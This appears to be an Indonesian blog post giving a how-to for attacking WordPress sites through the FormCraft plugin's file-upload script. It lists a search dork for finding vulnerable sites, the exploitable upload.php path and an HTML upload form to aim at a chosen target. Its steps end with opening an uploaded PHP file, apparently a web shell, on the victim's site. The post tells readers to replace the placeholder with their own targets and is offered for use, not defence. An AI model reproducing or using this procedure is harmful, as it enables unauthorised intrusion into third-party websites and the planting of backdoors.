Jakarta
Bahan :
Dork : inurl:"wp-content/plugins/formcraft/"
Exploit :
[+]wp-content/plugins/formcraft/file-upload/server/php/upload.php
Atau
[+]wp-content/plugins/formcraft/file-upload/server/php/
Script CSRF :
<form method="POST" action="http://localhost/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form> {Simpan dengan (*.html)}
Note :
Tulisan yang berwarna orange ganti degan web target kalian!
Langkah-lagkah :
1. Cari web dengan dork diatas
2. Lalu pilih salah satu web
3. Masukkan exploit (contoh : www.example.com/wp-content/plugins/formcraft/file- upload/server/php/upload.php)
4. Jika Vuln akan tampil seperti ini
5. Tinggal File diedit di script CSRF
6. Buka Script FormCraft tadi, lalu upload file kalian
7. Jika sudah akan terlihat seperti gambar ini
![[Image: Screenshot_1.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vEOq8bj2xpefLO-n03W5hxVvI60m4wLb1M3Ch8KEsPORU6foZozW_IViPrWfKxYKhF50xQ2fvSxBmjTxR5Xk9PfgnhDDzNY3EruEwQImaNyMMuVg=s0-d)
8. Buka web (contoh : www.example.com/mico.php) atau (contoh : www.example.com/wp-content/plugins/formcraft/file-upload/server/php/mico.php)....Selesai
Sekian...
0 comments:
Post a Comment
Tolong Beri Komentar Anda
~Berkomentarlah dengan sopan
~Jika ada masalah tulis dikomentar
~Tidak SPAM!